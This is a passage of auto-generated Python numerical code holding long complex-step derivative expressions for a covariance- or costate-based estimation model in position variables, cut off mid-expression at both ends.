yb**2)) + lamP13_N*p11_n*p11_s*p23_n*p23_s*xb*y_n*y_s/(Dt*p13_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP13_N*p11_n*p11_s*p23_n*p23_s*xb*yb/(Dt*p13_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP13_N*p12_n*p12_s*p13_n*x_s*y_n*y_s*(1.0e-100*1j + x_n)/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP13_N*p12_n*p12_s*p13_n*x_s*yb*(1.0e-100*1j + x_n)/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP13_N*p12_n*p12_s*p13_n*xb*y_n*y_s/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - 
lamP13_N*p12_n*p12_s*p13_n*xb*yb/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP13_N*p12_n*p12_s*p23_n*p23_s*y_n**2*y_s**2/(Dt*p13_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP13_N*p12_n*p12_s*p23_n*p23_s*y_n*y_s*yb/(Dt*p13_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP13_N*p12_n*p12_s*p23_n*p23_s*yb**2/(Dt*p13_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP22_N*p12_n**2*p12_s**2*x_s**2*(1.0e-100*1j + x_n)**2/(Dt*p22_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP22_N*p12_n**2*p12_s**2*x_s*xb*(1.0e-100*1j + x_n)/(Dt*p22_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP22_N*p12_n**2*p12_s**2*xb**2/(Dt*p22_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - 2*lamP22_N*p12_n*p12_s*p22_n*x_s*y_n*y_s*(1.0e-100*1j + x_n)/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP22_N*p12_n*p12_s*p22_n*x_s*yb*(1.0e-100*1j + x_n)/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP22_N*p12_n*p12_s*p22_n*xb*y_n*y_s/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - 2*lamP22_N*p12_n*p12_s*p22_n*xb*yb/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP22_N*p22_n**2*p22_s*y_n**2*y_s**2/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 
2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP22_N*p22_n**2*p22_s*y_n*y_s*yb/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP22_N*p22_n**2*p22_s*yb**2/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p12_n*p12_s*p13_n*p13_s*x_s**2*(1.0e-100*1j + x_n)**2/(Dt*p23_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP23_N*p12_n*p12_s*p13_n*p13_s*x_s*xb*(1.0e-100*1j + x_n)/(Dt*p23_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p12_n*p12_s*p13_n*p13_s*xb**2/(Dt*p23_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p12_n*p12_s*p23_n*x_s*y_n*y_s*(1.0e-100*1j + x_n)/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP23_N*p12_n*p12_s*p23_n*x_s*yb*(1.0e-100*1j + x_n)/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP23_N*p12_n*p12_s*p23_n*xb*y_n*y_s/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p12_n*p12_s*p23_n*xb*yb/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p13_n*p13_s*p22_n*p22_s*x_s*y_n*y_s*(1.0e-100*1j + x_n)/(Dt*p23_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP23_N*p13_n*p13_s*p22_n*p22_s*x_s*yb*(1.0e-100*1j + x_n)/(Dt*p23_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 
2*y_n*y_s*yb + yb**2)) + lamP23_N*p13_n*p13_s*p22_n*p22_s*xb*y_n*y_s/(Dt*p23_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p13_n*p13_s*p22_n*p22_s*xb*yb/(Dt*p23_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p22_n*p22_s*p23_n*y_n**2*y_s**2/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP23_N*p22_n*p22_s*p23_n*y_n*y_s*yb/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p22_n*p22_s*p23_n*yb**2/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP33_N*p13_n**2*p13_s**2*x_s**2*(1.0e-100*1j + x_n)**2/(Dt*p33_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP33_N*p13_n**2*p13_s**2*x_s*xb*(1.0e-100*1j + x_n)/(Dt*p33_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP33_N*p13_n**2*p13_s**2*x_s*y_n*y_s*(1.0e-100*1j + x_n)/(Dt*p33_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP33_N*p13_n**2*p13_s**2*x_s*yb*(1.0e-100*1j + x_n)/(Dt*p33_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP33_N*p13_n**2*p13_s**2*xb**2/(Dt*p33_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP33_N*p13_n**2*p13_s**2*xb*y_n*y_s/(Dt*p33_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - 
lamP33_N*p13_n**2*p13_s**2*xb*yb/(Dt*p33_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP33_N*p13_n*p13_s*p23_n*p23_s*x_s*y_n*y_s*(1.0e-100*1j + x_n)/(Dt*p33_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP33_N*p13_n*p13_s*p23_n*p23_s*x_s*yb*(1.0e-100*1j + x_n)/(Dt*p33_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP33_N*p13_n*p13_s*p23_n*p23_s*xb*y_n*y_s/(Dt*p33_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP33_N*p13_n*p13_s*p23_n*p23_s*xb*yb/(Dt*p33_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP33_N*p13_n*p13_s*p23_n*p23_s*y_n**2*y_s**2/(Dt*p33_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP33_N*p13_n*p13_s*p23_n*p23_s*y_n*y_s*yb/(Dt*p33_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP33_N*p13_n*p13_s*p23_n*p23_s*yb**2/(Dt*p33_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)))/1e-100),
(tf)*(-np.imag(-lamP11_N*p11_n**2*p11_s*x_n**2*x_s**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + 2*lamP11_N*p11_n**2*p11_s*x_n*x_s*xb/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP11_N*p11_n**2*p11_s*xb**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - 2*lamP11_N*p11_n*p12_n*p12_s*x_n*x_s*y_s*(1.0e-100*1j + y_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + 2*lamP11_N*p11_n*p12_n*p12_s*x_n*x_s*yb/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + 2*lamP11_N*p11_n*p12_n*p12_s*xb*y_s*(1.0e-100*1j + y_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - 2*lamP11_N*p11_n*p12_n*p12_s*xb*yb/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP11_N*p12_n**2*p12_s**2*y_s**2*(1.0e-100*1j + y_n)**2/(Dt*p11_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + 2*lamP11_N*p12_n**2*p12_s**2*y_s*yb*(1.0e-100*1j + y_n)/(Dt*p11_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP11_N*p12_n**2*p12_s**2*yb**2/(Dt*p11_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP12_N*p11_n*p11_s*p12_n*x_n**2*x_s**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + 2*lamP12_N*p11_n*p11_s*p12_n*x_n*x_s*xb/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + 
y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP12_N*p11_n*p11_s*p12_n*xb**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP12_N*p11_n*p11_s*p22_n*p22_s*x_n*x_s*y_s*(1.0e-100*1j + y_n)/(Dt*p12_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + lamP12_N*p11_n*p11_s*p22_n*p22_s*x_n*x_s*yb/(Dt*p12_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + lamP12_N*p11_n*p11_s*p22_n*p22_s*xb*y_s*(1.0e-100*1j + y_n)/(Dt*p12_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP12_N*p11_n*p11_s*p22_n*p22_s*xb*yb/(Dt*p12_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP12_N*p12_n**2*p12_s*x_n*x_s*y_s*(1.0e-100*1j + y_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + lamP12_N*p12_n**2*p12_s*x_n*x_s*yb/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + lamP12_N*p12_n**2*p12_s*xb*y_s*(1.0e-100*1j + y_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP12_N*p12_n**2*p12_s*xb*yb/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP12_N*p12_n*p22_n*p22_s*y_s**2*(1.0e-100*1j + y_n)**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + 2*lamP12_N*p12_n*p22_n*p22_s*y_s*yb*(1.0e-100*1j + y_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - 
lamP12_N*p12_n*p22_n*p22_s*yb**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP13_N*p11_n*p11_s*p13_n*x_n**2*x_s**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + 2*lamP13_N*p11_n*p11_s*p13_n*x_n*x_s*xb/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP13_N*p11_n*p11_s*p13_n*xb**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP13_N*p11_n*p11_s*p23_n*p23_s*x_n*x_s*y_s*(1.0e-100*1j + y_n)/(Dt*p13_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + lamP13_N*p11_n*p11_s*p23_n*p23_s*x_n*x_s*yb/(Dt*p13_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + lamP13_N*p11_n*p11_s*p23_n*p23_s*xb*y_s*(1.0e-100*1j + y_n)/(Dt*p13_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP13_N*p11_n*p11_s*p23_n*p23_s*xb*yb/(Dt*p13_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP13_N*p12_n*p12_s*p13_n*x_n*x_s*y_s*(1.0e-100*1j + y_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + lamP13_N*p12_n*p12_s*p13_n*x_n*x_s*yb/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + lamP13_N*p12_n*p12_s*p13_n*xb*y_s*(1.0e-100*1j + y_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP13_N*p12_n*p12_s*p13_n*xb*yb/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + 
y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP13_N*p12_n*p12_s*p23_n*p23_s*y_s**2*(1.0e-100*1j + y_n)**2/(Dt*p13_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + 2*lamP13_N*p12_n*p12_s*p23_n*p23_s*y_s*yb*(1.0e-100*1j + y_n)/(Dt*p13_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP13_N*p12_n*p12_s*p23_n*p23_s*yb**2/(Dt*p13_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP22_N*p12_n**2*p12_s**2*x_n**2*x_s**2/(Dt*p22_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + 2*lamP22_N*p12_n**2*p12_s**2*x_n*x_s*xb/(Dt*p22_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP22_N*p12_n**2*p12_s**2*xb**2/(Dt*p22_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - 2*lamP22_N*p12_n*p12_s*p22_n*x_n*x_s*y_s*(1.0e-100*1j + y_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + 2*lamP22_N*p12_n*p12_s*p22_n*x_n*x_s*yb/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + 2*lamP22_N*p12_n*p12_s*p22_n*xb*y_s*(1.0e-100*1j + y_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - 2*lamP22_N*p12_n*p12_s*p22_n*xb*yb/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP22_N*p22_n**2*p22_s*y_s**2*(1.0e-100*1j + y_n)**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + 
yb**2)) + 2*lamP22_N*p22_n**2*p22_s*y_s*yb*(1.0e-100*1j + y_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP22_N*p22_n**2*p22_s*yb**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP23_N*p12_n*p12_s*p13_n*p13_s*x_n**2*x_s**2/(Dt*p23_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + 2*lamP23_N*p12_n*p12_s*p13_n*p13_s*x_n*x_s*xb/(Dt*p23_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP23_N*p12_n*p12_s*p13_n*p13_s*xb**2/(Dt*p23_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP23_N*p12_n*p12_s*p23_n*x_n*x_s*y_s*(1.0e-100*1j + y_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + lamP23_N*p12_n*p12_s*p23_n*x_n*x_s*yb/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + lamP23_N*p12_n*p12_s*p23_n*xb*y_s*(1.0e-100*1j + y_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP23_N*p12_n*p12_s*p23_n*xb*yb/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP23_N*p13_n*p13_s*p22_n*p22_s*x_n*x_s*y_s*(1.0e-100*1j + y_n)/(Dt*p23_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + lamP23_N*p13_n*p13_s*p22_n*p22_s*x_n*x_s*yb/(Dt*p23_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + 